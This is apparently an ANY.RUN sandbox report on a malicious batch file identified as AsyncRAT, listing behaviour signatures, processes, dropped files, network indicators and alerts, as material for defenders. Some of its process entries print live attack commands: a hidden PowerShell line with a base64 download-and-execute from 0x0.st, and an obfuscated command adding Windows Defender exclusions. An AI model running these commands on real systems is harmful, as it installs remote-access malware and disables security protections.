File name:

dwm.bat

Full analysis: https://app.any.run/tasks/27f1a007-4225-484f-8ee1-f172dc1aa4d1
Verdict: Malicious activity
Threats:

AsyncRAT is a RAT that can monitor and remotely control infected systems. This malware was introduced on GitHub as legitimate open-source remote administration software, but hackers use it for its many powerful malicious functions.

Analysis date: January 30, 2025, 08:27:28
OS: Windows 10 Professional (build: 19045, 64 bit)
Tags:
susp-powershell
stealer
fody
rat
asyncrat
remote
Indicators:
MIME: text/plain
File info: ASCII text, with very long lines (57718), with CRLF line terminators
MD5:

151B7FE444AF5423AD79C0C83558B402

SHA1:

664D48C7C188A5085FDE5A50842F63F5F2191BFE

SHA256:

DF22C1BF851BE9C64682E7838B6B88358C64A9E3FD6E8AD305F7303D06660323

SSDEEP:

12288:O3WghT6onokzHxgSVW0U/cBGnciS8mJa4Ce:4hT5i9/cBGhFmJaze

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Changes powershell execution policy (Bypass)

      • cmd.exe (PID: 3536)
    • Bypass execution policy to execute commands

      • powershell.exe (PID: 4500)
      • powershell.exe (PID: 4120)
    • Run PowerShell with an invisible window

      • powershell.exe (PID: 4500)
      • powershell.exe (PID: 3848)
      • powershell.exe (PID: 4120)
    • Known privilege escalation attack

      • dllhost.exe (PID: 3568)
    • Adds process to the Windows Defender exclusion list

      • dllhost.exe (PID: 3568)
    • Gets or sets the symmetric key that is used for encryption and decryption (POWERSHELL)

      • powershell.exe (PID: 4120)
    • Uses AES cipher (POWERSHELL)

      • powershell.exe (PID: 4120)
    • Dynamically loads an assembly (POWERSHELL)

      • powershell.exe (PID: 4120)
    • Gets or sets the initialization vector for the symmetric algorithm (POWERSHELL)

      • powershell.exe (PID: 4120)
    • Actions look like stealing of personal data

      • powershell.exe (PID: 4120)
    • ASYNCRAT has been detected (SURICATA)

      • powershell.exe (PID: 4120)
  • SUSPICIOUS

    • The process bypasses the loading of PowerShell profile settings

      • cmd.exe (PID: 3536)
    • Possibly malicious use of IEX has been detected

      • cmd.exe (PID: 3536)
    • Uses base64 encoding (POWERSHELL)

      • powershell.exe (PID: 4500)
      • powershell.exe (PID: 4120)
    • Starts CMD.EXE for commands execution

      • cmd.exe (PID: 1704)
    • Executing commands from a ".bat" file

      • cmd.exe (PID: 1704)
    • Application launched itself

      • cmd.exe (PID: 1704)
    • Starts POWERSHELL.EXE for commands execution

      • cmd.exe (PID: 3536)
      • dllhost.exe (PID: 3568)
    • CSC.EXE is used to compile C# code

      • csc.exe (PID: 6784)
    • Executable content was dropped or overwritten

      • csc.exe (PID: 6784)
    • Script adds exclusion path to Windows Defender

      • dllhost.exe (PID: 3568)
    • Uses TASKKILL.EXE to kill process

      • dllhost.exe (PID: 3568)
    • Probably UAC bypass using CMSTP.exe (Connection Manager service profile)

      • powershell.exe (PID: 4500)
    • Script adds exclusion process to Windows Defender

      • dllhost.exe (PID: 3568)
    • Contacting a server suspected of hosting a CnC

      • powershell.exe (PID: 4120)
    • Connects to unusual port

      • powershell.exe (PID: 4120)
    • Uses sleep to delay execution (POWERSHELL)

      • powershell.exe (PID: 4120)
  • INFO

    • Checks whether the specified file exists (POWERSHELL)

      • powershell.exe (PID: 4500)
    • Checks supported languages

      • csc.exe (PID: 6784)
      • cvtres.exe (PID: 6920)
    • Disables trace logs

      • powershell.exe (PID: 4500)
    • Checks proxy server information

      • powershell.exe (PID: 4500)
      • powershell.exe (PID: 4120)
    • Found Base64 encoded network access via PowerShell (YARA)

      • cmd.exe (PID: 3536)
      • powershell.exe (PID: 4500)
    • Found Base64 encoded file access via PowerShell (YARA)

      • cmd.exe (PID: 3536)
    • Reads the machine GUID from the registry

      • csc.exe (PID: 6784)
    • Creates files in a temporary directory

      • cvtres.exe (PID: 6920)
      • csc.exe (PID: 6784)
    • Creates files in the program directory

      • dllhost.exe (PID: 3568)
    • Detects Fody packer (YARA)

      • powershell.exe (PID: 4500)
    • Checks if a key exists in the options dictionary (POWERSHELL)

      • powershell.exe (PID: 3848)
    • Script raised an exception (POWERSHELL)

      • powershell.exe (PID: 3848)
    • Checks transactions between databases Windows and Oracle

      • cmstp.exe (PID: 6984)
    • Uses string split method (POWERSHELL)

      • powershell.exe (PID: 4120)
    • Gets data length (POWERSHELL)

      • powershell.exe (PID: 4120)
    • Uses string replace method (POWERSHELL)

      • powershell.exe (PID: 4120)
    • Converts byte array into ASCII string (POWERSHELL)

      • powershell.exe (PID: 4120)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.
No data.
All screenshots are available in the full report
Total processes
142
Monitored processes
15
Malicious processes
5
Suspicious processes
0

Behavior graph

Processes shown in the behavior graph: cmd.exe, conhost.exe, cmd.exe, conhost.exe, powershell.exe, csc.exe, cvtres.exe, cmstp.exe, CMSTPLUA, powershell.exe, conhost.exe, powershell.exe (#ASYNCRAT), taskkill.exe, conhost.exe, svchost.exe

Process information

PID
CMD
Path
Indicators
Parent process
PID:
1704
CMD:
C:\WINDOWS\system32\cmd.exe /c ""C:\Users\admin\AppData\Local\Temp\dwm.bat" "
Path:
C:\Windows\System32\cmd.exe
Parent process:
explorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\cmd.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\cmdext.dll
c:\windows\system32\advapi32.dll
PID:
2144
CMD:
\??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1
Path:
C:\Windows\System32\conhost.exe
Parent process:
cmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Console Window Host
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
PID:
2192
CMD:
C:\WINDOWS\system32\svchost.exe -k NetworkService -p -s Dnscache
Path:
C:\Windows\System32\svchost.exe
Parent process:
services.exe
User:
NETWORK SERVICE
Company:
Microsoft Corporation
Integrity Level:
SYSTEM
Description:
Host Process for Windows Services
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\svchost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\kernel.appcore.dll
PID:
3536
CMD:
C:\WINDOWS\system32\cmd.exe /K "C:\Users\admin\AppData\Local\Temp\dwm.bat"
Path:
C:\Windows\System32\cmd.exe
Parent process:
cmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\cmd.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\cmdext.dll
c:\windows\system32\advapi32.dll
PID:
3568
CMD:
C:\WINDOWS\system32\DllHost.exe /Processid:{3E5FC7F9-9A51-4367-9063-A120244FBEC7}
Path:
C:\Windows\System32\dllhost.exe
Parent process:
svchost.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
COM Surrogate
Version:
10.0.19041.3636 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\dllhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\kernel.appcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\bcryptprimitives.dll
PID:
3820
CMD:
\??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1
Path:
C:\Windows\System32\conhost.exe
Parent process:
powershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Console Window Host
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
PID:
3848
CMD:
powershell -WindowStyle Hidden -c .('Add-MpP' + 'reference') -ExclusionPath C:\ -ExclusionProcess powershell.exe
Path:
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Parent process:
dllhost.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Windows PowerShell
Exit code:
1
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\atl.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\user32.dll
c:\windows\system32\win32u.dll
c:\windows\system32\msvcp_win.dll
PID:
4120
CMD:
"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('[base64 payload omitted; see the full report]')) | Invoke-Expression"
Path:
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Parent process:
cmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\syswow64\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\msvcrt.dll
c:\windows\syswow64\oleaut32.dll
PID:
4500
CMD:
powershell.exe -noprofile -windowStyle Hidden -ep bypass -command "Invoke-Expression ([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('aWV4IChJbnZva2UtV2ViUmVxdWVzdCAtVXJpICJodHRwczovLzB4MC5zdC84WDVULnBzMSIp')))"
Path:
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Parent process:
cmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
PID:
5652
CMD:
\??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1
Path:
C:\Windows\System32\conhost.exe
Parent process:
cmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Console Window Host
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
Total events
18 222
Read events
18 196
Write events
26
Delete events
0

Modification events

(PID) Process:
(6984) cmstp.exe
Key:
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\CMSTP
Operation:
write
Name:
EnableFileTracing
Value:
0
(PID) Process:
(6984) cmstp.exe
Key:
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\CMSTP
Operation:
write
Name:
EnableAutoFileTracing
Value:
0
(PID) Process:
(6984) cmstp.exe
Key:
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\CMSTP
Operation:
write
Name:
EnableConsoleTracing
Value:
0
(PID) Process:
(6984) cmstp.exe
Key:
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\CMSTP
Operation:
write
Name:
FileTracingMask
Value:
(PID) Process:
(6984) cmstp.exe
Key:
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\CMSTP
Operation:
write
Name:
ConsoleTracingMask
Value:
(PID) Process:
(6984) cmstp.exe
Key:
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\CMSTP
Operation:
write
Name:
MaxFileSize
Value:
1048576
(PID) Process:
(6984) cmstp.exe
Key:
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\CMSTP
Operation:
write
Name:
FileDirectory
Value:
%windir%\tracing
(PID) Process:
(3568) dllhost.exe
Key:
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\cmmgr32.exe
Operation:
write
Name:
ProfileInstallPath
Value:
C:\ProgramData\Microsoft\Network\Connections\Cm
(PID) Process:
(6984) cmstp.exe
Key:
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Network\Network Connections
Operation:
write
Name:
DesktopShortcut
Value:
0
(PID) Process:
(3568) dllhost.exe
Key:
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion
Operation:
write
Name:
SM_AccessoriesName
Value:
Accessories
Executable files
2
Suspicious files
7
Text files
12
Unknown types
0

Dropped files

PID
Process
Filename
Type
PID:
4500
Process:
powershell.exe
Filename:
C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_frwn1tth.fjj.ps1
Type:
text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
PID:
4500
Process:
powershell.exe
Filename:
C:\Users\admin\AppData\Local\Temp\vyxgcijg.0.cs
Type:
text
MD5:B126AC3DA39FFA35CB857267CBC70CBB
SHA256:6E6DD39153A84B94B4F309A4C4521260CBDD8A6922ADE46096F42DA39BC20B93
PID:
4500
Process:
powershell.exe
Filename:
C:\Windows\Temp\dnb3vetm.inf
Type:
text
MD5:05662B83FF7DB6317E391454787598D8
SHA256:0322B78214D9FB1D40D9BF162A44F9A5FE13FCB21C96B8B0F0E289E939A9FA5C
PID:
6784
Process:
csc.exe
Filename:
C:\Users\admin\AppData\Local\Temp\CSC10A73122AECC4C8D9594F3EA6BEF9AB.TMP
Type:
binary
MD5:9505958D90497DCF4CE8D50DB32BF29F
SHA256:623D9855F1BE340A906693C228DCC868F93786ED01E6BC3427EFAC7269860676
PID:
3848
Process:
powershell.exe
Filename:
C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms~RF139fcd.TMP
Type:
binary
MD5:D040F64E9E7A2BB91ABCA5613424598E
SHA256:D04E0A6940609BD6F3B561B0F6027F5CA4E8C5CF0FB0D0874B380A0374A8D670
PID:
6784
Process:
csc.exe
Filename:
C:\Users\admin\AppData\Local\Temp\vyxgcijg.out
Type:
text
MD5:5859DC6A9DDD860D3A9F8D9DBAC9AE82
SHA256:18D6CBBEC1B24FE69585BDFD487870B363DFCD89EEC5905E56CBB70F913993FF
PID:
6920
Process:
cvtres.exe
Filename:
C:\Users\admin\AppData\Local\Temp\RES9195.tmp
Type:
binary
MD5:EAFC9AEBC301A68060F47819BE7E5C34
SHA256:06F2F3027847C4D071183249E3BAC8F93BED794E9A4E06ABB6B3758544018A52
PID:
3848
Process:
powershell.exe
Filename:
C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Type:
binary
MD5:E9ADC7F941C7D5A31CCC346DBD7635E4
SHA256:0DC7697F04A2EA776D6BF2A92747B3132FBDDEA0DAD5F667C25F47070A0F7B15
PID:
3848
Process:
powershell.exe
Filename:
C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\RP5X48NBYGR8AYVSY94S.temp
Type:
binary
MD5:E9ADC7F941C7D5A31CCC346DBD7635E4
SHA256:0DC7697F04A2EA776D6BF2A92747B3132FBDDEA0DAD5F667C25F47070A0F7B15
PID:
4500
Process:
powershell.exe
Filename:
C:\Users\admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Type:
binary
MD5:C56399F8B851B0DA3452FFFCBB9F6DB4
SHA256:79D31FEA7C6E4297969DC4164156EB807CC6EF4E571AC90CCD02BE66B7EAE7F7
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
6
TCP/UDP connections
33
DNS requests
16
Threats
7

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
5064
SearchApp.exe
GET
200
184.30.131.245:80
http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBTrjrydRyt%2BApF3GSPypfHBxR5XtQQUs9tIpPmhxdiuNkHMEWNpYim8S8YCEAI5PUjXAkJafLQcAAsO18o%3D
unknown
whitelisted
4712
MoUsoCoreWorker.exe
GET
200
184.30.21.171:80
http://www.microsoft.com/pkiops/crl/MicSecSerCA2011_2011-10-18.crl
unknown
whitelisted
1176
svchost.exe
GET
200
184.30.131.245:80
http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSAUQYBMq2awn1Rh6Doh%2FsBYgFV7gQUA95QNVbRTLtm8KPiGxvDl7I90VUCEAJ0LqoXyo4hxxe7H%2Fz9DKA%3D
unknown
whitelisted
6332
SIHClient.exe
GET
200
184.30.21.171:80
http://www.microsoft.com/pkiops/crl/Microsoft%20ECC%20Product%20Root%20Certificate%20Authority%202018.crl
unknown
whitelisted
6332
SIHClient.exe
GET
200
184.30.21.171:80
http://www.microsoft.com/pkiops/crl/Microsoft%20ECC%20Update%20Secure%20Server%20CA%202.1.crl
unknown
whitelisted
6700
backgroundTaskHost.exe
GET
200
2.23.77.188:80
http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBQ50otx%2Fh0Ztl%2Bz8SiPI7wEWVxDlQQUTiJUIBiV5uNu5g%2F6%2BrkS7QYXjzkCEAUZZSZEml49Gjh0j13P68w%3D
unknown
whitelisted

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
4
System
192.168.100.255:138
whitelisted
4712
MoUsoCoreWorker.exe
184.30.21.171:80
www.microsoft.com
AKAMAI-AS
DE
whitelisted
51.104.136.2:443
MICROSOFT-CORP-MSN-AS-BLOCK
IE
whitelisted
1344
svchost.exe
51.104.136.2:443
MICROSOFT-CORP-MSN-AS-BLOCK
IE
whitelisted
5064
SearchApp.exe
104.126.37.128:443
Akamai International B.V.
DE
unknown
3976
svchost.exe
51.104.136.2:443
MICROSOFT-CORP-MSN-AS-BLOCK
IE
whitelisted
4500
powershell.exe
168.119.145.117:443
0x0.st
Hetzner Online GmbH
DE
suspicious
5064
SearchApp.exe
104.126.37.176:443
Akamai International B.V.
DE
unknown
5064
SearchApp.exe
184.30.131.245:80
ocsp.digicert.com
AKAMAI-AS
US
whitelisted
1176
svchost.exe
20.190.160.66:443
login.live.com
MICROSOFT-CORP-MSN-AS-BLOCK
NL
whitelisted

DNS requests

Domain
IP
Reputation
www.microsoft.com
  • 184.30.21.171
whitelisted
0x0.st
  • 168.119.145.117
unknown
ocsp.digicert.com
  • 184.30.131.245
  • 2.23.77.188
whitelisted
login.live.com
  • 20.190.160.66
  • 20.190.160.128
  • 20.190.160.130
  • 40.126.32.140
  • 40.126.32.133
  • 40.126.32.74
  • 20.190.160.67
  • 20.190.160.17
whitelisted
go.microsoft.com
  • 184.30.18.9
whitelisted
slscr.update.microsoft.com
  • 4.175.87.197
whitelisted
fe3cr.delivery.mp.microsoft.com
  • 13.95.31.18
whitelisted
settings-win.data.microsoft.com
  • 40.127.240.158
whitelisted
arc.msn.com
  • 20.31.169.57
whitelisted
fd.api.iris.microsoft.com
  • 20.74.47.205
whitelisted

Threats

PID
Process
Class
Message
2192
svchost.exe
Misc activity
ET FILE_SHARING File Sharing Related Domain in DNS Lookup (0x0 .st)
4500
powershell.exe
Misc activity
ET FILE_SHARING File Sharing Domain Observed in TLS SNI (0x0 .st)
4120
powershell.exe
Misc activity
ET FILE_SHARING File Sharing Domain Observed in TLS SNI (0x0 .st)
2192
svchost.exe
Potentially Bad Traffic
ET DYN_DNS DYNAMIC_DNS Query to a *.duckdns .org Domain
2192
svchost.exe
Misc activity
ET DYN_DNS DYNAMIC_DNS Query to *.duckdns. Domain
4120
powershell.exe
Domain Observed Used for C2 Detected
ET MALWARE Generic AsyncRAT/zgRAT Style SSL Cert
4120
powershell.exe
Malware Command and Control Activity Detected
REMOTE [ANY.RUN] AsyncRAT Successful Connection
No debug info